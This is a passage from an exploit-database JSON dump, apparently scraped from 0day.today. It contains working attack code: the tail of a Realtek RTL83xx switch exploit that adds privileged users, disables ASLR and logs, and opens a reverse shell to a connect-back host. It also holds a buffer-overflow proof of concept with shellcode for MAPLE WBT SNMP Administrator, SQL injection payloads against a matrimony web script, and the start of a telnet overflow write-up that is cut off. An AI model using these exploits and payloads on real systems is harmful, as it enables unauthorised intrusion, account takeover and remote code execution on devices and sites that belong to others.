self.target['exploit']['sntp']['verify_uri']\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read().split()\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tif response[0] == '0':\r\n\t\t\t\t\t\tSNTP.status(\"ASLR disabled\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Check Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tSNTP.failure(\"RCE #2 Failed\")\r\n\t\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"RCE #1 Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tSNTP.status(\"Removing RCE\")\r\n\t\tURI = self.target['exploit']['sntp']['delete_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['delete_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = response.split('\"')\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\tSNTP.status(\"RCE Removed\")\r\n\t\t\t\t\tbreak\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tSNTP.status(\"RCE Removed\")\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"RCE Remove Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['sntp']['disable_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['disable_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'SNTP':\r\n\r\n\t\t\t\t\tif response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\telif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Disable SNTP Failed\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tURI = self.target['exploit']['sntp']['status_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response) # MCW TEST\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tfor status in result['data']:\r\n\t\t\t\t\tif status == 'sntp' and result['data']['sntp'] == True:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntp' and result['data']['sntp'] == False:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == True:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Enabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == False:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"Disable SNTP Failed\")\r\n\t\t\t\treturn False\r\n\r\n\r\n\t\tSNTP.success(\"ASLR: Success\")\r\n\t\treturn True\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\t#\r\n\t# Help, info and pre-defined values\r\n\t#\t\r\n\tINFO = 'Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)\\n'\r\n\tHTTP = \"http\"\r\n\tHTTPS = \"https\"\r\n\tproto = HTTP\r\n\tverbose = False\r\n\traw_request = True\r\n\trhost = '192.168.57.20'\t# Default Remote HOST\r\n\trport = '80'\t\t\t# Default Remote PORT\r\n\tlhost = '192.168.57.1'\t# Default Local HOST\r\n\tlport = '1337'\t\t\t# Default Local PORT\r\n\tcreds = 'pwn:pwn'\t\t# creds = 'user:pass'\r\n\tetag = ''\r\n\r\n\t#\r\n\t# Try to parse all arguments\r\n\t#\r\n\ttry:\r\n\t\targ_parser = argparse.ArgumentParser(\r\n\t\tprog=sys.argv[0],\r\n\t\t\t\tdescription=('[*] '+ INFO +' [*]'))\r\n\t\targ_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n\t\targ_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n\t\targ_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n\t\targ_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n\t\tif creds:\r\n\t\t\targ_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n\t\targ_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')\r\n\r\n\t\targ_parser.add_argument('--hydra', required=False, default=False, action='store_true', help='Boa/Hydra Web Server - reverse shell')\r\n\t\targ_parser.add_argument('--force', required=False, default=False, action='store_true', help='Ignore warnings for exploits marked not safe')\r\n\t\targ_parser.add_argument('--etag', required=False, help='Select target manually with their ETag')\r\n\r\n\t\targ_parser.add_argument('--shell', required=False, default=False, action='store_true', help='Unauthenticated - reverse shell - CGIs')\r\n\r\n\t\targ_parser.add_argument('--debug', required=False, default=False, action='store_true', help='Debug SEND/RECV data and line numbers in code')\r\n\r\n\t\targ_parser.add_argument('--verify', required=False, default=False, action='store_true', help='Verify unauthenticated vulnerabilities - CGIs')\r\n\t\targ_parser.add_argument('--report', required=False, default=False, action='store_true', help='Generate report based on dictionary')\r\n\r\n\t\targ_parser.add_argument('--adduser', required=False, default=False, action='store_true', help='Add \"'+ creds + '\" with privilege 15')\r\n\t\targ_parser.add_argument('--deluser', required=False, default=False, action='store_true', help='Delete \"'+ creds + '\" credentials')\r\n\r\n\t\targs = arg_parser.parse_args()\r\n\texcept Exception as e:\r\n\t\tlog.info(INFO)\r\n\t\tlog.info(\"Error: {}\".format(e))\r\n\t\tsys.exit(1)\r\n\r\n\t# We want at least one argument, so print out help\r\n\tif len(sys.argv) == 1:\r\n\t\targ_parser.parse_args(['-h'])\r\n\r\n\tprint \"\"\r\n\tlog.info(INFO)\r\n\r\n\tif args.report:\r\n\t\tVendor(\"report\").dict()\r\n\t\tsys.exit(0)\r\n\r\n\tif args.debug:\r\n\t\tdebug = True\r\n\r\n\tif args.force:\r\n\t\tforce = True\r\n\t#\r\n\t# Check validity, update if needed, of provided options\r\n\t#\r\n\tif args.https:\r\n\t\tproto = HTTPS\r\n\t\tif not args.rport:\r\n\t\t\trport = '443'\r\n\r\n\tif creds and args.auth:\r\n\t\tcreds = args.auth\r\n\r\n\tif args.rport:\r\n\t\trport = args.rport\r\n\r\n\tif args.etag:\r\n\t\tetag = args.etag\r\n\r\n\tif args.rhost:\r\n\t\trhost = args.rhost\r\n\r\n\tif args.lport:\r\n\t\tlport = args.lport\r\n\r\n\tif args.lhost:\r\n\t\tlhost = args.lhost\r\n\r\n\t# Check if RPORT is valid\r\n\tif not Validate(verbose).Port(rport):\r\n\t\tlog.failure(\"Invalid RPORT - Choose between 1 and 65535\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if LPORT is valid\r\n\tif not Validate(verbose).Port(lport): #\r\n\t\tlog.failure(\"Invalid LPORT - Choose between 1 and 65535\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Let's break apart the hex code of LPORT into two bytes and check for badbyte 0x00\r\n\tport_hex = hex(int(lport))[2:]\r\n\tport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n\tport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n\tport_hex = port_hex.split()\r\n\tif len(port_hex) == 1:\r\n\t\tport_hex = ('00' + ' ' + ''.join(port_hex)).split()\r\n\r\n\tfor c in port_hex:\r\n\t\tif c == '00':\r\n\t\t\tlog.failure(\"Choosen port (dec: {}, hex: {}) contains 0x00 - aborting\".format(lport,hex(int(lport))))\r\n\t\t\tsys.exit(1)\r\n\r\n\t# Check if RHOST is valid IP or FQDN, get IP back\r\n\trhost = Validate(verbose).Host(rhost)\r\n\tif not rhost:\r\n\t\tlog.failure(\"Invalid RHOST\")\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if LHOST is valid IP or FQDN, get IP back\r\n\tlhost = Validate(verbose).Host(lhost)\r\n\tif not lhost:\r\n\t\tlog.failure(\"Invalid LHOST\")\r\n\t\tsys.exit(1)\r\n\r\n\t#\r\n\t# Validation done, start print out stuff to the user\r\n\t#\r\n\tif args.https:\r\n\t\tlog.info(\"HTTPS / SSL Mode Selected\")\r\n\tlog.info(\"RHOST: {}\".format(rhost))\r\n\tlog.info(\"RPORT: {}\".format(rport))\r\n\tlog.info(\"LHOST: {}\".format(lhost))\r\n\tlog.info(\"LPORT: {}\".format(lport))\r\n\r\n\trhost = rhost + ':' + rport\r\n\r\n\ttry:\r\n\r\n\t\theaders = {\r\n\t\t\t'Host':rhost,\r\n\t\t\t'User-Agent':'Chrome',\r\n\t\t\t'Accept':'*/*',\r\n\t\t\t'Content-Type':'application/x-www-form-urlencoded'\r\n\t\t\t}\r\n\t\t#\r\n\t\t# We can manually select target with the '--etag'\r\n\t\t#\r\n\t\ttarget = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).check_remote(etag)\r\n\r\n\t\t#\r\n\t\t# Whole code based on known 'target's ETag\r\n\t\t#\r\n\t\tif target:\r\n\r\n\t\t\tif args.verify:\r\n\t\t\t\tRTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,True) # check all listed\r\n\r\n\t\t\telif args.hydra:\r\n\t\t\t\tif not target['exploit']['heack_hydra_shell']['safe'] and not args.force:\r\n\t\t\t\t\tlog.failure(\"Boa/Hydra listed as not safe (most likely DoS), force with '--force'\")\r\n\t\t\t\t\tlog.failure(\"The best chance of success is with fresh heap and select target model manually\")\r\n\t\t\t\t\tlog.failure(\"use '--etag' for manual selection, '--etag help' for known targets\")\r\n\t\t\t\t\tsuccess = False\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_hydra_shell(target)\r\n\t\t\t\t\tsuccess = False\r\n\r\n\t\t\telif args.adduser:\r\n\t\t\t\tif target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_add_account(target)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)\r\n\r\n\t\t\telif args.deluser:\r\n\t\t\t\tif target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_del_account(target)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)\r\n\t\t\t\t\t\tif success:\r\n\t\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)\r\n\r\n\t\t\telif args.shell:\r\n\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,False) # check only one\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# shellcode on heap, no need to disable ASLR\r\n\t\t\t\t#\r\n\t\t\t\tif not target['exploit']['heack_cgi_shell']['stack']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t#\r\n\t\t\t\t# shellcode on stack, we need to disable ASLR\r\n\t\t\t\t#\r\n\t\t\t\telif target['exploit']['stack_cgi_diag']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_diag(target)\r\n\t\t\t\telif target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_sntp(target)\r\n\t\t\t\t#\r\n\t\t\t\t# or we take the long way\r\n\t\t\t\t#\r\n\t\t\t\telif target['login']['vulnerable'] and not target['exploit']['stack_cgi_diag']['vulnerable'] or not target['exploit']['stack_cgi_sntp']['vulnerable']:\r\n\t\t\t\t\tif not args.auth:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).disable_clean_log(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).SNTP(target)\r\n\r\n\t\t\t\t\tif success and not args.auth:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)\r\n\t\t\t\t\tif success:\r\n\t\t\t\t\t\tsuccess = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tlog.failure(\"We have no way to reach shellcode...\")\r\n\t\t\t\t\tsuccess = False\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# No meaning to try exploit if above failed\r\n\t\t\t\t#\r\n\t\t\t\tif success:\r\n\t\t\t\t\tRTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_shell(target)\r\n\r\n\texcept Exception as e:\r\n\t\tlog.info(\"Failed: ({})\".format(e))\r\n\r\n\tlog.info(\"All done...\")\r\n\r\n\tsys.exit(0)\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33299"}, {"lastseen": "2019-12-04T04:01:59", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-07-17T00:00:00", "published": "2019-07-17T00:00:00", "id": "1337DAY-ID-32998", "href": "https://0day.today/exploit/description/32998", "title": "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow\r\n# Author: hyp3rlinx\r\n# Vendor Homepage: www.computerlab.com\r\n# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager\r\n# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE\r\n# Tested on OS: Windows\r\n# CVE: CVE-2019-13577\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt\r\n[+] ISR: Apparition Security \r\n \r\n\r\n[Vendor]\r\nwww.computerlab.com\r\n\r\n\r\n[Product]\r\nMAPLE Computer WBT SNMP Administrator (Thin Client Administrator)\r\nv2.0.195.15\r\n\r\nhttps://www.computerlab.com/index.php/downloads/category/27-device-manager\r\nftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE\r\nSnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4\r\n\r\nThe CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.\r\nThis software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).\r\nAgents are built into the clients for remote management and configuration.\r\n\r\n\r\n[Vulnerability Type]\r\nUnauthenticated Remote Buffer Overflow Code Execution 0day\r\n\r\n\r\n[CVE Reference]\r\nCVE-2019-13577\r\n\r\n\r\n[Security Issue]\r\nSnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.\r\nThis will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.\r\nAuthentication is not required for this exploit.\r\n\r\nThis program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.\r\nWhen installing the vulnerable program if asks for a serial number just enter a value of \"1\" or something.\r\nUpon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.\r\nInterestingly, it seems to drop DLLs with .tmp extensions in AppData\\Local\\Temp directory, make OS system files viewable in explorer to see them.\r\n\r\ne.g. C:\\Users\\blah\\AppData\\Local\\Temp\\~ip6B92.tmp\r\n\r\nASLR / SEH all set to False helping to make exploit more portable. \r\n\r\nCALL EBX\r\n10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\\Program Files (x86)\\SnmpAdm\\ipwSNMPv5.dll)\r\n\r\nStack dump:\r\n\r\nEAX 41414141\r\nECX 0018FEFC\r\nEDX 0018FF10\r\nEBX 022DDA78 ASCII \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nESP 0018FECC\r\nEBP 0018FEF4\r\nESI 0018FF10\r\nEDI 0018FEFC\r\nEIP 41414141\r\nC 0 ES 002B 32bit 0(FFFFFFFF)\r\nP 1 CS 0023 32bit 0(FFFFFFFF)\r\nA 0 SS 002B 32bit 0(FFFFFFFF)\r\nZ 0 DS 002B 32bit 0(FFFFFFFF)\r\nS 0 FS 0053 32bit 7EFDD000(FFF)\r\nT 0 GS 002B 32bit 0(FFFFFFFF)\r\nD 0\r\nO 0 LastErr ERROR_NO_SCROLLBARS (000005A7)\r\nEFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)\r\n\r\n\r\n\r\n[Exploit/POC]\r\nfrom socket import *\r\nimport struct,sys,argparse\r\n\r\n#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15\r\n#CVE-2019-13577\r\n#Remote Buffer Overflow 0day\r\n#hyp3rlinx - ApparitionSec\r\n\r\n#Pop calc.exe Windows 7 SP1\r\nsc=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n\r\neip = struct.pack(\"<L\", 0x10008fb3) #JMP EBX\r\npopebx = struct.pack(\"<L\", 0x022C0012) #5B POP EBX\r\n\r\nbuf0=\"B\"*693704 \r\nbuf1=eip\r\nbuf2=popebx+sc+\"R\"*899+\"W\"*23975 \r\npayload=buf0+buf1+buf2\r\n\r\ndef doit(IP,payload):\r\n try:\r\n s=socket(AF_INET, SOCK_STREAM) \r\n s.connect((IP, 987))\r\n s.send(payload)\r\n print \"CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day.\"\r\n print \"hyp3rlinx\"\r\n s.close()\r\n except Exception as e:\r\n print str(e)\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-i\", \"--ipaddress\", help=\"IP of Target CVE-2019-13577\")\r\n return parser.parse_args()\r\n\r\ndef main(args):\r\n doit(args.ipaddress,payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if not len(sys.argv) > 1:\r\n print \"[*] No args supplied see Help -h\"\r\n exit()\r\n main(parse_args())\r\n\r\n\r\n\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=THMqueCIrFw\r\n\r\n\r\n[Network Access]\r\nRemote\r\n\r\n\r\n[Severity]\r\nHigh\r\n\r\n\r\n[Disclosure Timeline]\r\nVendor Notification: July 10, 2019\r\nSecond vendor notification attempt: July 13, 2019\r\nNo vendor replies.\r\nJuly 17, 2019 : Public Disclosure\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. All content (c).\r\n\r\nhyp3rlinx\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32998"}, {"lastseen": "2019-03-26T01:13:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "1337DAY-ID-32411", "href": "https://0day.today/exploit/description/32411", "title": "Matri4Web Matrimony Web Script SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Matrimony Website Script - Multiple SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: https://www.matri4web.com\r\n# Demo Site: https://www.matrimonydemo.com\r\n# Version: M-Plus\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/simplesearch_results.php\r\nVulnerable Parameter: txtGender (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/advsearch_results.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nage1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 3 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/specialcase_results.php\r\nVulnerable Parameter: Fage\r\nAttack Pattern:\r\nFage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'\"%2B(select(0)from(select(sleep(0)))v)%2B\"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7\r\n\r\n----- PoC 4 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/locational_results.php\r\nVulnerable Parameter: cboCountry (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 5 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/registration2.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nEMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1\n\n# 0day.today [2019-03-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32411"}, {"lastseen": "2018-12-24T20:31:21", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2018-12-17T00:00:00", "published": "2018-12-17T00:00:00", "id": "1337DAY-ID-31805", "href": "https://0day.today/exploit/description/31805", "title": "GNU inetutils < 1.9.4 - (telnet.c) Multiple Overflows Exploit", "type": "zdt", "sourceData": "GNU inetutils <= 1.9.4 telnet.c multiple overflows\r\n==================================================\r\nGNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment \r\nvariable handling which can be exploited to escape restricted shells on embedded devices. \r\nMost modern browsers no longer support telnet:// handlers, but in instances where URI\r\nhandlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. \r\nA stack-based overflow is present in the handling of environment variables when connecting \r\ntelnet.c to remote telnet servers through oversized DISPLAY arguments.\r\n\r\nA heap-overflow is also present which can be triggered in a different code path due to \r\nsupplying oversized environment variables during client connection code. \r\n\r\nThe stack-based overflow can be seen in the following code snippet from the latest inetutils \r\nrelease dated 2015.\r\n\r\ninetutils-telnet/inetutils-1.9.4/telnet/telnet.c\r\n\r\n983- case TELOPT_XDISPLOC:\r\n984- if (my_want_state_is_wont (TELOPT_XDISPLOC))\r\n985-\treturn;\r\n986- if (SB_EOF ())\r\n987-\treturn;\r\n988- if (SB_GET () == TELQUAL_SEND)\r\n989-\t{\r\n990-\t unsigned char temp[50], *dp;\r\n991-\t int len;\r\n992-\r\n993-\t if ((dp = env_getvalue (\"DISPLAY\")) == NULL)\r\n994-\t {\r\n995-\t /*\r\n996-\t * Something happened, we no longer have a DISPLAY\r\n997-\t * variable. So, turn off the option.\r\n998-\t */\r\n999-\t send_wont (TELOPT_XDISPLOC, 1);\r\n1000-\t break;\r\n1001-\t }\r\n1002:\t sprintf ((char *) temp, \"%c%c%c%c%s%c%c\", IAC, SB, TELOPT_XDISPLOC,\r\n1003-\t\t TELQUAL_IS, dp, IAC, SE);\r\n1004-\t len = strlen ((char *) temp + 4) + 4;\t/* temp[3] is 0 ... */\r\n1005-\r\n1006-\t if (len < NETROOM ())\r\n\r\nWhen a telnet server requests environment options the sprintf on line 1002 will\r\nnot perform bounds checking and causes an overflow of stack buffer temp[50] defined\r\nat line 990. This issue can be trivially fixed using a patch to add bounds checking\r\nto sprintf such as with a call to snprintf(); \r\n\r\nAn example of the heap overflow can be seen when handling large environment\r\nvariables within the telnet client, causing heap buffer memory corruption\r\nthrough long string supplied in example USER or DISPLAY.\r\n\r\nAn example of 